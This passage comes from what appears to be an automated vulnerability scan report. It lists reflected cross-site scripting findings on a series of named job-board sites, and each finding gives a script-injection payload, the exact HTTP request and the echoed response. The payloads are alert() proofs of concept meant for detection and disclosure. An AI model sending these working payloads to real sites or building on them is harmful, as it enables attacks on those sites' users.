Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117169

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.governmentcrossing.com/?35b65"><script>alert(1)</script>8b14ad25588=1">
...[SNIP]...

3.71. http://www.healthcarecrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthcarecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60560"><script>alert(1)</script>134d0f273ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?60560"><script>alert(1)</script>134d0f273ed=1 HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:10 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vlk8ael6dhgvt7bvpfsh8e5c36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 140436

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.healthcarecrossing.com/?60560"><script>alert(1)</script>134d0f273ed=1">
...[SNIP]...

3.72. http://www.helpdeskcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.helpdeskcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ca57"><script>alert(1)</script>85f9f0a617e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4ca57"><script>alert(1)</script>85f9f0a617e=1 HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5pc34q4kl032si755vlkdonr01; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108372

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.helpdeskcrossing.com/?4ca57"><script>alert(1)</script>85f9f0a617e=1">
...[SNIP]...

3.73. http://www.hospitalitycrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hospitalitycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 832b1"><script>alert(1)</script>22eb64144cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?832b1"><script>alert(1)</script>22eb64144cc=1 HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a67315d75br9o1gcjr9is307g2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 129156

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.hospitalitycrossing.com/?832b1"><script>alert(1)</script>22eb64144cc=1">
...[SNIP]...

3.74. http://www.hrcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hrcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb605"><script>alert(1)</script>bb1cbc2fed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fb605"><script>alert(1)</script>bb1cbc2fed9=1 HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ffv3i9vte4g564t23mih093eo2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116797

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.hrcrossing.com/?fb605"><script>alert(1)</script>bb1cbc2fed9=1">
...[SNIP]...

3.75. http://www.hvaccrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hvaccrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ad5"><script>alert(1)</script>15b6379fa02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c4ad5"><script>alert(1)</script>15b6379fa02=1 HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=uipdahmc9kasevm17lp9tie0s7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112743

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.hvaccrossing.com/?c4ad5"><script>alert(1)</script>15b6379fa02=1">
...[SNIP]...

3.76. http://www.informationtechnologycrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationtechnologycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe89"><script>alert(1)</script>2552cabb35c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?abe89"><script>alert(1)</script>2552cabb35c=1 HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=airnfqpaunrhe1ksoustac7no7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133940

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.informationtechnologycrossing.com/?abe89"><script>alert(1)</script>2552cabb35c=1">
...[SNIP]...

3.77. http://www.insurcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insurcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaf58"><script>alert(1)</script>b6fe24e8d54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?eaf58"><script>alert(1)</script>b6fe24e8d54=1 HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d7obm82fb47njpvi2di4tqcjg4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 127269

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.insurcrossing.com/?eaf58"><script>alert(1)</script>b6fe24e8d54=1">
...[SNIP]...

3.78. http://www.intellectualpropertycrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intellectualpropertycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1e0"><script>alert(1)</script>6b575e61947 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fa1e0"><script>alert(1)</script>6b575e61947=1 HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ebiu1eg1hbgqgof2fg6sqjau1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118064

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.intellectualpropertycrossing.com/?fa1e0"><script>alert(1)</script>6b575e61947=1">
...[SNIP]...

3.79. http://www.internshipcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internshipcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b43b"><script>alert(1)</script>cd4dbddd825 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4b43b"><script>alert(1)</script>cd4dbddd825=1 HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8s0f63cmgh30cj79o4c02g2hs6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 132185

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.internshipcrossing.com/?4b43b"><script>alert(1)</script>cd4dbddd825=1">
...[SNIP]...

3.80. http://www.j2eecrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.j2eecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 901d9"><script>alert(1)</script>537a79e09a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?901d9"><script>alert(1)</script>537a79e09a3=1 HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4fiue61e3a63g6up9j0v9od9g3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111709

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.j2eecrossing.com/?901d9"><script>alert(1)</script>537a79e09a3=1">
...[SNIP]...

3.81. http://www.journalismcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.journalismcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49fb4"><script>alert(1)</script>5e010705692 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?49fb4"><script>alert(1)</script>5e010705692=1 HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m2dmhs0p970tp09le2iib1k566; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:15 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111407

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.journalismcrossing.com/?49fb4"><script>alert(1)</script>5e010705692=1">
...[SNIP]...

3.82. http://www.lawcrossing.com/lcjssearchresults.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /lcjssearchresults.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cde91"><script>alert(1)</script>1010a52da99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lcjssearchresults.php/cde91"><script>alert(1)</script>1010a52da99 HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7et0cefrt5l6f61hpkgascchn0; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 92602

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<form id="formmain" name="formmain" Method="POST" action="/lcjssearchresults.php/cde91"><script>alert(1)</script>1010a52da99" onSubmit="return gotopageno();">
...[SNIP]...

3.83. http://www.logisticscrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logisticscrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c0f2"><script>alert(1)</script>581f158145d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2c0f2"><script>alert(1)</script>581f158145d=1 HTTP/1.1
Host: www.logisticscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:55 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qieacg3sf3ukten0tvgskqclr5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
